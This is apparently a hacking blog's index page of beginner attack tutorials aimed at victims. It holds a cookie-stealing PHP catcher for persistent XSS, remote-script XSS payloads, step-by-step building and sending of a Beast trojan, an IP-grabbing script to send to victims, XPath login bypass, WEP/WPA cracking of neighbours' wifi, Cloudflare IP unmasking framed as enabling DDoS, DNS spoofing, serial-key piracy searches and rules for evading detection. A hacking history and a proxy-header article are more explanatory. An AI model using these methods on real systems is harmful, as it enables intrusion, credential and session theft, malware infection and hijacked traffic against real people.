HOW TO FIND SERIAL KEYS FROM GOOGLE

*** HOW TO FIND SERIAL KEYS FROM GOOGLE***
steps:-
1) go to google.com
2) write the name of the software you want key. and add 94FBR at the end

Eg :- if you want to find key of IDM then write " IDM 94FBR " (without quotes)

3) search it and you will find many sites with serial keys of that softwares

Read more ...

XPATH INJECTION TUTORIAL

XPATH INJECTION TUTORIAL

XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.

We are gonna learn using simple example. Download code from here & put it in your local server directory.(Code is created by Amol Naik )

Sample XML Document which we gonna use:-

<Employees>
<!-- Employees Database -->
  <Employee ID="1">
    <FirstName>Johnny</FirstName>
    <LastName>Bravo</LastName>
    <UserName>jbravo</UserName>
    <Password>test123</Password>
    <Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <FirstName>Mark</FirstName>
    <LastName>Brown</LastName>
    <UserName>mbrown</UserName>
    <Password>demopass</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="3">
    <FirstName>William</FirstName>
    <LastName>Gates</LastName>
    <UserName>wgates</UserName>
    <Password>MSRocks!</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="4">
    <FirstName>Chris</FirstName>
    <LastName>Dawes</LastName>
    <UserName>cdawes</UserName>
    <Password>letmein</Password>
    <Type>User</Type>
  </Employee>
</Employees>

Bypass Authentication:-

Browse to the login.php page; here we can see simple login form.

Bypass Authentication

If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:

Username: ' or '1' = '1
Password:  ' or '1' = '1

Bypass Authentication using XPATH injection


Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.

Authentication Bypass
Privilege Escalation
Username Enumeration

We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.

Using cookie
Using brute-force
Using SQL injection
(1)Authentication Bypass Using Cookie:-
As we know that , mutillidae is vulnerable to XSS, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.

http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php

Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.

Content of cookie_catcher.php :-

<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.

Read more ...

HOW TO FIND REAL I.P. PROTECTED BY CLOUD FLARE?

HOW TO FIND REAL I.P. PROTECTED BY CLOUD FLARE?

All these methods are based on bad admin configurations, but still are quite common

If you want to find real I.P. address of website, which is hidden by CLOUDFLARE. It has came to my attention that many booters, hosts, malicious websites, and more use CloudFlare for DDoS Protection & Anti-Abuse Report Protection. With CloudFlare protection, it is difficult to get the hosts IP; therefore, it is difficult to send an abuse report or launch a (D)DoS attack. This simple guide will help you obtain any website protected by CloudFlare's real IP, which can be used for whatever you desire!

METHOD 1:-

If you simply ping the domain , it will give i.p. which is not website`s real i.p. address. you should try following option to get real I.P. address of domain.

ping direct-connect.domain.com

             OR

ping direct.domain.com

             OR

ping ftp.domain.com

             OR

ping cpanel.domain.com

             OR

ping mail.domain.com

METHOD 2 :-

For a Long Aged Domain you can use netcraft toolbar to check real ip

For Example

Code:

http://toolbar.netcraft.com/site_report?url=DOMAIN.COM

Clearly We can see change in IP to a cloudflare one.

METHOD 3 :-

You can try bruteforcing DNS , some subdomain will have real IP of website.

For this purpose you need NMAP tools.

Open your terminal with root privellege & type following code

# nmap -sV -sS -F <target>

it will scan host & give results , it`s not give real i.p. of website.(but from this you can know weather website is protected by CLOUDFLARE or not)

Now type following code in terminal

# nmap --script dns-brute -sn <target>

it will give you real I.P. of website.


I made simple bash script which do all things for you.For more details click here.

IF all of above methods does not work ;then there is no admin misconfiguration. So you cannot find real I.P.

Read more ...

Hacking rules

Hacking rules :-
1. Never damage any system. This will
only get you into
trouble.
2. Never alter any of the systems files,
except for those
needed to insure that you are not
detected, and those to
insure that you have access into that
computer in the
future.
3. Do not share any information about
your hacking
projects with anyone but those you'd
trust with your life.
4. When posting on BBS's (Bulletin
Board Systems) be as
vague as possible when describing your
current hacking
projects. BBS's CAN be monitered by
law enforcement.
5. Never use anyone's real name or real
phone number
when posting on a BBS.
6. Never leave your handle on any
systems that you hack
in to.
7. DO NOT hack government computers.
8. Never speak about hacking projects
over your home
telephone line.
9. Be paranoid. Keep all of your hacking
materials in a safe
place.
10. To become a real hacker, you have to
hack. You can't
just sit around reading text files and
hanging out on
BBS's. This is not what hacking is all
about....

Read more ...

Basic XSS Cross Site Scripting Demo

Basic XSS Cross Site Scripting Demo

Tweet

Allot of you guys aren't clear with xss aka cross site scripting and for that many of you were sending me mails on how to do xss attack , etc and that's why i got this video which explains some basic concepts of the Xss attack and how it can be practiced and how can we use it to hack anybody. 

This video is controversial by Brial Contos, CISSP from a company named IMPERVA. it takes through each and every step involved to find a xss vulnerability in a webpage . and showcases some of the basic steps that you need to know.

What is XSS

Cross-site scripting ('XSS' or 'CSS') is an attack that takes advantage of a Web site vulnerability in which the site displays content that includes un-sanitized user-provided data. For example, an attacker might place a hyperlink with an embedded malicious script into an online discussion forum….

That purpose of the malicious script is to attack other forum users who happen to select the hyperlink. For example it could copy user cookies and then send those cookies to the attacker. 

Conclusion

Now you might be clear with xss attacks it is easy and can be used in man terms to hack anybody or anything else for fun also. Now lets take a look at some of the commonly used xss scripts and code snippets -

Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector:

<SCRIPT SRC="http://pavanjoshi2050.blogspot.in/xss.jpg”></SCRIPT>

This is most simplest snippet used to find a Xss vulnerability in a webpage.

<SCRIPT>alert('XSS');</SCRIPT>

This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):

<SCRIPT SRC=”http://pavanjoshi2050.blogspot.in/xss.js”></SCRIPT>

There are many more xss vulnerabilities you can use to bypass the security but they are most useful to find a xss vulnerability in webpage.

Read more ...

HOW TO HACK VICTIM PC USING BEAST TROJAN

only for educational purpose:-

NOTE : i'm nt responsible fr any damage

=================================
step1:download beast trojan google n install it

step2: unrar the pack

step3: Open The software you will get the screen
HOW TO MAKE A TROJAN USING BEAST TROJAN

STEP1:Now Click on ” Build server ” button.

step2:now click on notofication tab

step3:In the notifications tab click on the e-mail
button.

step3:now fill ur proper email

step4: Now Go to “AV-FW kill ” tab.

step5:now put a tick mark on the ” disable XP
firewall “.

step6: Now Click on “EXE icon ” tab.

step7:n now u can choose any icon for the file
from the list or you
can browse the icon from the directory and can
use it.

step8: Now click on the ” Save Server ” button and
the Trojan Will be made.

step9: Now Send this Trojan File to victim.

step10: As and when the victim will install the
trojan on his system you will get a notification e-
mail on your specified e-mail id while making the
trojan. This Email consist of the IP address and
port of the victim.

step11:now put his ip address in a ''host colum" n
put his port in "port colum"

step12:After That Click on the “Go Beast ” Button
and You will be connected to victims PC.

step13: Now Select the action or task you want to
execute on victims PC form the given list.

step14:Now to destroy or kill the trojan click on
the ” server ” tab from the menu.

step15:- Now Click on the ” Kill Server ” button
and the trojan will be destroyed from the victims
PC.

then u r done

Read more ...

How to grab someone's IP address?

1) Copy the below codes into Notepad and save it
as Grab.php (.php is must)
2)
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE
_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number
,10,102,153);
$textcolor = imagecolorallocate($img_number
,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X
_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";
Imagestring($img_number,10,5,5,$number0,$text
color);
Imagestring($img_number,10,5,25,$number1,$tex
tcolor);
Imagestring($img_number,10,5,45,$number2,$tex
tcolor);
Imagestring($img_number,10,5,50,$number4,$tex
tcolor);
Imagestring($img_number,10,8,50,$number4,$tex
tcolor);
Imagestring($img_number,10,5,10,$number4,$tex
tcolor);
Imagestring($img_number,10,8,10,$number4,$tex
tcolor);
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.tx
t","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER
[HTTP_X_FORWARDED_FOR] - Host: $hostname -
'\n' ";
fwrite($file, $file2);
fclose($file);
?>
3) Now make Free account on any of the free web
hosting sites Ripway.com or on My3gb .

4) Now Upload Grab.php to your web hosting site.

5) Copy the link of your uploaded file and send it
to victim.

6) As soon as victim will click on your link his ip
will be saved in your free web hosting site.

7) Enjoy you are Done and Share with your friends

NOTE: Never use any of the tricks for
something evil always love what you do and do it
legally

Read more ...

How to Crack wifi network’s password:-

Hello and welcome to my tutorial about wireless networking.

Today I’ll be teaching you how easy it is to obtain access to a wireless protected network by cracking the Wi-Fi network’s password.

There are lots of questions coming from the beginners on how to get WEP/WPA/WPA2 password and accessing neighbor’s wi-fi connection.

We all should be aware of fact that Wep Encrpytion is easy to crack while WPA and WPA2 is comparatively difficult and it needs a handshake dictionary. 

Here, we will be covering all of the aspects and ways of hacking a wi-fi network using backtrack and gaining access to the router.
==>>How to Crack WEP password
What You need to succeed-

wep

A compatible wireless adapter—This is the biggest requirement to hack any wi-fi network. You’ll need a wireless adapter that’s capable of packet injection, and chances are the one in your computer is not.

A BACKTRACK CD-Download yourself a copy of the backtrack CD and burn it, or load it up in VMware to get started.
A nearby WEP-enabled Wi-Fi network. The wep signal should be strong and ideally people are using it, connecting and disconnecting their devices from it.

Okay so let’s begin, so first we need to open a terminal of backtrack. To do that, just click the little icon that’s on the right side from System. Please see the image below:

backtrack
STEP 1:

Type the command- airmon-ng

This command displays our interfaces.In my case I have wlan0, and now we are going to put it into monitor mode.
STEP 2:

Type- airmon-ng start wlan0.

As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.

backtrack
STEP 3:

Type airodump-ng mon0 and that will start scanning for wi-fi networks. As you can see, there is a network called SKIDHACKER. Take a note of the BSSID the DATA, the CHANNEL and the type of ENCRYPTION. Please refer to the image below, if you have any trouble getting to that point.

wifi-hacking
STEP 4:

Now we are going to set it to lock on a specific wi-fi network named SKIDHACKER. To do that, type airodump-ng -c (channel) -w WEPcrack –bssid (bssid of the network) mon0. Replace (channel) with the channel of the victim’s network, and replace (bssid of the network) with the bssid of the victim’s network.

hack wifi passwords

Okay so as you can probably see the data is going really slow, and we need to boost that up. We are going to need a lot more data, so let’s preform one of the aireplay commands that will boost that data.
STEP 5:

Firstly, open up a new terminal and type aireplay-ng -1 0 -a (bsisd) mon0 where (bssid) is the bssid of the network. Now if your Wi-Fi card is supported, you should see Association successful , if you don’t see that then your card is not supported.

hack wifi passwords
Step 6:

Now we are going to type in aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0. And now when the question Use this packet ? pops up, just push the letter y. And now as you can see in the image below, the data went high drastically.

backtrack
STEP 7:

Okay so now lets open a new terminal and we are going to attempt to crack it with the amount of data we have. I recommend getting over 20000 data before trying. So let’s type aircrack-ng WEPcrack*.cap. Replace WEPcrack with the filename you chose before when capturing the data, and don’t forget to add that asterisk after the file and the extension which is .cap.

crack wifi network’s password
STEP 8:

And now it will attempt to get the password. Just wait a couple of minutes for it to complete, and once it did it will say KEY FOUND! [ XX:XX:XX:XX:XX ] where the X’s will be random numbers and/or letters. That’s not it, now to connect you will need to remove the semicolumns. For an example, if we were to have 12:34:52:66:59, the password would be 1232526659.

Just log in to your Windows OS, and connect using
 that password.

==========================================

==========================================
==>>How to Crack WPA/WPA2 Passowrd

wpa encryption

So lets begin. What you will need for this crack is a dictionary file that we are going to use to get the WPA/WPA2 password.

Remember, the bigger the dictionary file is the greater the chance you have in cracking the password.

So now you are probably wondering, where do I get a dictionary file? Well, I don’t know if this is allowed or not but I recently downloaded a 1.9GB dictionary file.You can google for it.
STEP 1:

Okay, so firstly open up a terminal and once we have the terminal open we are going to type in airmon-ng which will display our wireless interfaces.

In my case I have wlan0, and now we are going to put it into monitor mode.

wireless hacking
STEP 2:

Type airmon-ng start wlan0. As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.
STEP 3:

Lets type in airodump-ng mon0 and this command is going to initiate the scanning process for wifi networks. As you can see in the picture below, a few WPA encrypted networks should pop up. I’m going to attempt to crack the network under the bssidSKIDH?CKER. Take a note of the channel, and you want to copy the BSSID for later use.

hack wifi
STEP 4:

Now type airodump-ng -c (channel) -w (filename) –bssid (bssid) mon0, and replace the values to fit what you got from the last step. Don’t forget to remember what filename you chose, because we are going to need that at the end.

hack wifi passwords
What is needed to get the WPA or WPA2 key is something called a WPA Handshake. You can obtain a handshake by kicking someone off the network, and those computers will automatically reconnect which will give you the handshake.

This means, if there is no one on the network, you can’t get a handshake, and you can’t crack the security of WPA network.
STEP 5:

So how do we know if someone is connected?Well look at the lower part of the airodump command, and you will notice something as STATION, and underneath that if someone is connected it wil show you their mac address.

WPA handshake

Once you get a handshake, airodump will alert you in the top screen, and the handshake will be located right from the time stamp.
STEP 6:

Okay, so lets open up a new terminal and we are going to kick off the computers connected. Lets type in aireplay-ng -1 0 -a (bssid) mon0. Replace bssid with the network you are trying to crack and hit enter. It is going to attempt to kick off a client, and if it succeeds you will see the wpa handshake at the top right corner, if you don’t run the aireplay command a couple of times.

Backtrack

So now that we have a wpa handshake file, we are going to attempt to crack it.
STEP 7:

Lets stop the scan by pressing CONTROL + C on the terminal where airodump is running. Now in order to find the handshake file, you need to go in the top menu and chose Places > Home Folder. Okay, so lets open up a terminal and we are going to type in aircrack-ng -w (dictionary) /root/(filename). Where filename is the filename you specified when capturing the wpa handshake and the dictionary is the path of the wordlist you downloaded.
STEP 8:

This can be done by dragging in the handshake file into the terminal after the aircrack-ng -w (dictionary) command and it will parse in it’s directory. All you need to do is hit enter. The password needs to be in the dictionary file, so the bigger the wordlist is the bigger are the chances of you getting the password.

handshake
If the password is in the wordlist, it will give you a success message and the key in brackets.
Happy hacking..!

commands

=>> airmon-ng
This backtrack command displays the wireless interfaces.

=>> airmon-ng start wlan0
This command starts monitoring mode on a wi-fi device.

=>> airodump-ng mon0
This command shows all of the wi-fi networks online.

=>> airodump-ng -c (channel) -w (filename) –bssid (bssid) mon0
This command specifies the wi-fi device to concentrate to one network.

=>> aireplay-ng -1 0 -a (bssid) mon0
This command kicks off clients that are connected, and gets the handshake.

=>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
This command boosts the data, when cracking WEP.

=>> aircrack-ng -w (dictionary) (wpa handshake)
This command is used when cracking WPA or WPA2 networks.

=>> aircrack-ng (filename)*.cap
This command is used when cracking WEP networks.

Read more ...

the history of hacking (must read)

Hacking has been around for more than a century. In the 1870s, several teenagers were flung off the country's brand new phone system by enraged authorities. Here's a peek at how busy hackers have been in the past 35 years.





Early 1960s

University facilities with huge mainframe computers, like MIT's artificial intelligence lab, become staging grounds for hackers. At first, "hacker" was a positive term for a person with a mastery of computers who could push programs beyond what they were designed to do.

Early 1970s

John Draper John Draper makes a long-distance call for free by blowing a precise tone into a telephone that tells the phone system to open a line. Draper discovered the whistle as a give-away in a box of children's cereal. Draper, who later earns the handle "Captain Crunch," is arrested repeatedly for phone tampering throughout the 1970s.

Yippie social movement starts YIPL/TAP (Youth International Party Line/Technical Assistance Program) magazine to help phone hackers (called "phreaks") make free long-distance calls.

Two members of California's Homebrew Computer Club begin making "blue boxes," devices used to hack into the phone system. The members, who adopt handles "Berkeley Blue" (Steve Jobs) and "Oak Toebark" (Steve Wozniak), later go on to found Apple Computer.

Early 1980s

Author William Gibson coins the term "cyberspace" in a science fiction novel called Neuromancer.

In one of the first arrests of hackers, the FBI busts the Milwaukee-based414s (named after the local area code) after members are accused of 60 computer break-ins ranging from Memorial Sloan-KetteringCancer Center to Los Alamos National Laboratory.

Comprehensive Crime Control Act gives Secret Service jurisdiction over credit card and computer fraud.

Two hacker groups form, the Legion of Doom in the United States and the Chaos Computer Club in Germany.

2600: The Hacker Quarterly is founded to share tips on phone and computer hacking.

Late 1980s

The Computer Fraud and Abuse Act gives more clout to federal authorities.

Computer Emergency Response Team is formed by U.S. defense agencies. Based at Carnegie Mellon University in Pittsburgh, its mission is to investigate the growing volume of attacks on computer networks.

At 25, veteran hacker Kevin Mitnick secretly monitors the e-mail of MCI and Digital Equipment security officials. He is convicted of damaging computers and stealing software and is sentenced to one year in prison.

First National Bank of Chicago is the victim of a $70-million computer heist.

An Indiana hacker known as "Fry Guy" -- so named for hacking McDonald's -- is raided by law enforcement. A similar sweep occurs in Atlanta for Legion of Doom hackers known by the handles "Prophet," "Leftist" and "Urvile."

Early 1990s

After AT&T long-distance service crashes on Martin Luther King Jr. Day, law enforcement starts a national crackdown on hackers. The feds nab St. Louis' "Knight Lightning" and in New York grab Masters of Deception trio "Phiber Optik," " Acid Phreak" and "Scorpion." Fellow hacker "Eric Bloodaxe" is picked up in Austin, Texas.

Operation Sundevil, a special team of Secret Service agents and members of Arizona's organized crime unit, conducts raids in 12 major cities, including Miami.

A 17-month search ends in the capture of hacker Kevin Lee Poulsen ("Dark Dante"), who is indicted for stealing military documents.

Hackers break into Griffith Air Force Base, then pewwwte computers at NASA and the Korean Atomic Research Institute. Scotland Yard nabs "Data Stream," a 16-year-old British teenager who curls up in the fetal position when seized.

A Texas A&M professor receives death threats after a hacker logs on to his computer from off-campus and sends 20,000 racist e-mail messages using his Internet address.

Kevin Mitnick [photo / AP ]In a highly publicized case, Kevin Mitnick is arrested (again), this time in Raleigh, N.C., after he is tracked down via computer by Tsutomu Shimomura at the San Diego Supercomputer Center.

Late 1990s

Hackers break into and deface federal Web sites, including the U.S. Department of Justice, U.S. Air Force, CIA, NASA and others.

Report by the General Accounting Office finds Defense Department computers sustained 250,000 attacks by hackers in 1995 alone.

A Canadian hacker group called the Brotherhood, angry at hackers being falsely accused of electronically stalking a Canadian family, break into the Canadian Broadcasting Corp. Web site and leave message: "The media are liars." Family's own 15-year-old son eventually is identified as stalking culprit.

Hackers pierce security in Microsoft's NT operating system to illustrate its weaknesses.

Popular Internet search engine Yahoo! is hit by hackers claiming a "logic bomb" will go off in the PCs of Yahoo!'s users on Christmas Day 1997 unless Kevin Mitnick is released from prison. "There is no virus," Yahoo! spokeswoman Diane Hunt said.

1998

Anti-hacker ad runs during Super Bowl XXXII. The Network Associates ad, costing $1.3-million for 30 seconds, shows two Russian missile silo crewmen worrying that a computer order to launch missiles may have come from a hacker. They decide to blow up the world anyway.

In January, the federal Bureau of Labor Statistics is inundated for days with hundreds of thousands of fake information requests, a hacker attack called "spamming."

Hackers break into United Nation's Children Fund Web site, threatening a "holocaust" if Kevin Mitnick is not freed.

Hackers claim to have broken into a Pentagon network and stolen software for a military satellite system. They threaten to sell the software to terrorists.

The U.S. Justice Department unveils National Infrastructure Protection Center, which is given a mission to protect the nation's telecommunications, technology and transportation systems from hackers.

Hacker group L0pht, in testimony before Congress, warns it could shut down nationwide access to the Internet in less than 30 minutes. The group urges stronger security measures.

Read more ...

Top 3 Proxy Issues That No One Ever Told You (must read)

Occasionally I used to get asked to look at web application architecture for companies. Companies that grow above a certain size or threat level often move to using inline caching proxies, inline cloud based WAF solutions (e.g. CloudFlare or Incapsula), or both. For a long time I’ve had a hard time explaining why this could be a problem but I finally ran into a confluence of problems that demonstrate why this is an issue. Let’s start with the major problem.

X-Forwarded-For

When you have a website that needs to use IP addresses, you’ll run into strange situations if you run an inline proxy. The most important issue is that the IP address of the machine connecting to your web server is always that of the upstream proxy/ies and not that of the person connecting. The user connects to the proxy and the proxy connects to your website; therefore, your website always sees the same IP address. IP addresses are used for all kinds of security measures. They’re used for seeding secret strings in cookies in PHP. They’re used for doing flood detection. They’re used for brute force detection and lockouts. IPs are used all the time. But what happens when all the IPs look the same?

To get around that, proxies have invented something called the X-Forwarded-For header, which can look like a lot of random things. It can look like any of the following:

X-Forwarded-For: 192.168.0.5
X-Forwarded-For: 192.168.1.2, 123.123.123.123
X-Forwarded-For: 1.3.3.7
X-Forwarded-For: localhost, 123.123.123.123

Because it’s an optional header it contains random things. Sometimes those things are real IP addresses (sometime internal RFC1918 address space and sometimes public) and sometimes it just contains garbage. Either way, most proxies have decided that the X-Forwarded-For header is the best header to use to tack on their information. So they tack the IP address of the user who is connecting to them onto the end of the string that they receive (or create a new string if there isn’t one already) and pass that to the web-server.

The web-server then has to be smart enough to take that information and parse apart the string to grab the last IP address and intelligently replace the IP address of the proxy with the IP address listed in the X-Forwarded-For header. Inline devices that sit behind the proxy have to be just as smart. This leads to all kinds of weird scenarios where an attacker can spoof IP addresses by sending X-Headers after having breached the network, but that is less likely.

rpaf

To accomplish this goal of looking at the X-Forwarded-For header, many people turn to rpaf, which performs this task very easily. The problem is that if rpaf doesn’t see the header it doesn’t know what IP address to use, and it will instead default to nothing. So how do we get the inline proxy to send something that rpaf won’t understand? Simple: we use a null byte (here shown as %00 below so you can visualize it, but normally it is not URL encoded):

GET / HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101
Firefox/19.0
X-Forwarded-For%00: whatever

This will create a 400 error, because Apache doesn’t understand the request. However, the most important thing is what it looks like in the logs. Notice that in the first log file there is an IP address, and in the second there’s no IP address:

Mar 17 20:05:46 123.123.123.123 – - [17/Mar/2013:20:05:46 +0000] “GET / HTTP/1.1″ 200 15 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0″

Mar 17 20:06:10 – - – [17/Mar/2013:20:06:10 +0000] “GET / HTTP/1.1″ 400 56 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0″

An attacker’s mileage my vary depending on how the proxy treats the header with a null byte in it. Still the proxy may do its own logging, which may render this attack useless. The most dangerous variant would be if an attacker can simply bypass the cloud based WAF solution and go directly to the origin server. By bypassing the WAF the attacker doesn’t have to worry about how the proxy handles the null byte or any extra logging it may perform.

400 errors

Why would an attacker intentionally want to send a request that creates a 400 error? There are lots of potential reasons. A few of the fine folks on Twitter suggested the following:

• Fingerprinting the operating system
• Filling up the logs
• Using the user-agent to seed the system logs with a remote file include
• Using the user-agent to seed the system to create XSS attacks in log parsers
• Distraction from another attack

There may be many additional reasons that a request that creates a 400 error may be useful, but the point is that as a result there’s no IP address associated with the request in the logs in Apache.

Obfuscation

Sometimes proxies may communicate very sensitive information to the server, so that the server knows that it’s talking to the right thing. These secrets can be just about anything. Let’s say for instance that knowing that secret would allow you to contact the server directly and it would believe you are the proxy. Then let’s say the proxy and the web server decide to use another X header instead of X-Forwarded-For to obfuscate it so that an attacker may not know what the real header is – then the attacker will be unable to spoof another IP address.

Here is where TRACE comes back to haunt us. The HTTP method TRACE comes back once every few years to cause problems, and for some reason it’s still enabled by default more times than not. With TRACE an attacker can see what they sent to the server. But because they are not connecting directly to the server but instead to the proxy, what the attacker really sees is what the proxy is sending to the web server. Here’s what it might look like:

TRACE / HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101
Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Date: Sat, 16 Mar 2013 22:05:22 GMT
Server: Apache
Content-Type: message/http
X-Secret-info: lkjfalkjsfoij2oif4oijalskdfjsecretstringgoeshere12342134
Obfuscated-Client-Ip: 123.123.123.123
Content-Length: 348

So relatively easily the attacker now knows the secret and the obfuscated header that the web server is using as a replacement for IP addresses. Assuming the web server allows inbound connections from the Internet and the real IP address of the web-server can be found out, the attacker can now communicate to the web-server as if they were another IP address. This is not an ideal scenario. So at an absolute minimum, disabling TRACE is a really important and easy step to take. But doing forensic logging which doesn’t rely on rpaf or other tricks to figure out IP address from alternate HTTP headers is also a good idea.

Read more ...

online hash crackers

only for educational purpose:-

Cracker                                                           Hashes
Tobtu                                                           50,529,455,839
TMTO                                                           36,436,233,567
MD5Decrypter(uk)                                           8,700,000,000
OnlineHashCrack                                           5,211,644,250
AuthSecu                                                            500,000,000



MD5th                                                           400,000,000
NetMD5crack                                                   171,392,210
Kalkulators                                                   100,000,000
Rednoize                                                           76,834,449
Gromweb                                                           45,543,530
hash-cracker.com                                           40,000,000
Crackfoo -NNC                                                   38,227,555
MD5Rainbow                                                   33,517,066
Digitalsun                                                           31,000,000
Sans                                                                   20,264,963
Crackfor.me                                                   16,173,854
MD5-lookup                                                   8,796,772
MD5decrypter                                                   8,103,123
MD5-db                                                           5,500,000
MD5-decrypter                                                   3,400,000
HashCracking.ru                                           3,585,150
Shalla                                                           2,218,319
Hash-Database                                                    1,635,062
MD5decryption                                                   1,300,000
Drasen                                                           568,064
MD5finder                                                   429,477
MD5pass                                                           327,497
Bokehman                                                           230,000
Shell-Storm                                                   154,994
Appspot                                                            Multi
Noisette                                                            Multi
MD5crack                                                            Multi
Kinginfet                                                            Multi
VHCTeam                                                               ?
Longgie                                                               ?
RAH-Labs                                                               ?
Wordd                                                               ?
Anqel                                                               ?
CMD5                                                               ?
web-security-services                                               ?
MD5online                                                       ?
MD5.my-addr                                                       ?
C0llision                                                               ?
MD5hood                                                               ?
Schwett                                                               ?
TheKaine                                                               ?
Fox21                                                               ?



NTLM
Cracker                                                           Hashes
MD5decrypter(uk)                                           8,700,000,000
OnlineHashCrack                                           5,211,644,250
hash-cracker.com                                           40,000,000
Fox21                                                                   ?
LMCrack                                                                   ?
CMD5                                                                   ?
  


LM
Cracker                                                            Hashes
OnlineHashCrack                                            5,211,644,250
NiceNameCrew                                                            ?
C0llision                                                                    ?
Fox21                                                                    ?



SHA1
Cracker                                                            Hashes
MD5Decrypter(uk)                                            8,700,000,000
Rednoize                                                            76,838,852
hash-cracker.com                                            40,000,000
Sans                                                                    20,264,963
SHA1-Lookup                                                    18,949,380
HashCracking.ru                                            3,585,150
Hash-Database                                                 1,635,065
CMD5                                                                 ?
StringFunction                                                          ?
Web-Security-Services                                         ?



SHA256-512
Cracker                                                             Hashes
Hash-Database                                                    1,635,067
Shalla                                                             1,143,472



MySQL
Cracker                                                             Hashes
OnlineHashCrack                                            5,211,644,250
Hashcrack                                                            30,654,899
HashCracking.ru                                            3,585,150
CMD5                                                                  ?

Read more ...

HOW TO DO DNS SPOOF(TUTORIAL)?

only for educational purpose:-


First What is the DNS ? 


The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the internet or a private network. It associates various information with domain names assigned to each of the participants. For example, http://www.example.com translates to208.77.188.166.

What does poisoning the DNS allow us to do ?

It allows us to redirect the traffic to another website.
First This is the structure of the network :

DNS-SPOOF

1 , 2 and 3 are computers
1 is the computer being the gateway (could be a router) (172.128.254.1)
2 is the target computer (172.128.254.10)
3 is the attacker using cain 
Note : IPs are just used for this tutorial and chosen randomly. 
Our work is on computer number 3 :
1-After you install cain , open it and go to the sniffer tab
2-Click on configure and choose your adapter


3-Enable the sniffer (click on the second icon in the toolbar next to the open icon)

4-Right click in the empty area and choose scan MAC addresses. We get the results above.

5-Click on the APR Tab


6-Click on the + sign in the toolbar to add a new ARP poison routing


7-choose the gateway which is 172.128.254.1 , in the next list you’ll get the IP of the computer 2 which is 172.128.254.10 and click ok 


8-now click on the APR-DNS tab

9-click on the + sign 

10-enter the web address that you want to spoof , (in this case when the user goes to facebook he’ll be redirected to myspace) click on resolve type the web address that you want to redirect the user to it, and click ok, and you’ll get the IP of the web address, then click ok


11-now to make this work we have to enable APR poisoning , click on the icon next to the sniffer icon, and everything should work as we expect.

Now the computer 2 will get the routes poisoned and when the user requests http://www.facebook.com he will be redirected to http://www.myspace.com .

just run your brain and imagine what you can do with this technique.  

Read more ...